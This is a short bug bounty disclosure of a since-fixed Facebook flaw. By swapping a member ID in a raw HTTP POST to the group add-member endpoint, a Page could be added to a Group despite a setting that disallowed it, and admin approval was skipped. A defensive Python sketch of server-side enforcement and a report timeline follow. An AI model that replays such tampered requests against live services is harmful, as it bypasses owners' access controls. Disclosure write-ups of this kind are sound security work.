[Facebook] Bypassing "Membership requests from Pages"

Any Page could be added to a Group even when "Membership requests from Pages" was set to Disallowed.

POC -

A Group member makes the following request -

=====================================================================

POST /ajax/groups/members/add_post/?dpr=1 HTTP/1.1
Host: www.facebook.com

group_id=XXX&members[0]=XXX&message_id=groupsAddMemberCompletionMessage&recommendation_key=default_XXX_XXX_0_1542532051_312&ref=&source=suggested_members_new&__user=XXX

=====================================================================

Here the "members[0]=" value could be changed to the ID of a Page that the member wanted to invite.

If this request was made by the Mod of a Group, no notification was sent to the Admin for Membership approval.
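
The behaviour described above points to a setting that was not enforced on the add-member endpoint itself. A minimal sketch of such a server-side check, as an added example (not Facebook's code; the data model, the IDs and the admin-approval policy are assumptions made for illustration):

```python
from dataclasses import dataclass, field
from enum import Enum

class Kind(Enum):
    USER = "user"
    PAGE = "page"

class Role(Enum):
    MEMBER = "member"
    MODERATOR = "moderator"
    ADMIN = "admin"

@dataclass
class Group:
    allow_pages: bool                      # the "Membership requests from Pages" setting
    roles: dict                            # actor id -> Role
    members: set = field(default_factory=set)
    pending_admin_approval: set = field(default_factory=set)

# Constructed ID directory; a real service would look the type up in its own store.
ENTITY_KINDS = {"u1": Kind.USER, "u2": Kind.USER, "u3": Kind.USER, "p9": Kind.PAGE}

def add_members(group, actor_id, member_ids):
    """Process an add-member request and return {member_id: outcome}."""
    role = group.roles.get(actor_id)
    if role is None:
        raise PermissionError("actor is not in the group")
    outcome = {}
    for mid in member_ids:
        kind = ENTITY_KINDS.get(mid)       # type resolved server-side, never taken from the request
        if kind is None:
            outcome[mid] = "rejected: unknown id"
        elif kind is Kind.PAGE and not group.allow_pages:
            # Enforced on the endpoint itself, so swapping an ID in members[] cannot skip it.
            outcome[mid] = "rejected: pages disallowed"
        elif kind is Kind.PAGE and role is not Role.ADMIN:
            # Assumed policy: Pages added by members or moderators wait for an admin.
            group.pending_admin_approval.add(mid)
            outcome[mid] = "pending admin approval"
        else:
            group.members.add(mid)
            outcome[mid] = "added"
    return outcome

if __name__ == "__main__":
    g = Group(allow_pages=False, roles={"u1": Role.MODERATOR}, members={"u1"})
    print(add_members(g, "u1", ["u2", "p9"]))
```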

Timeline -

Reported - Sunday, November 18, 2018

Marked as Duplicate - Wednesday, November 21, 2018

This is fixed now.
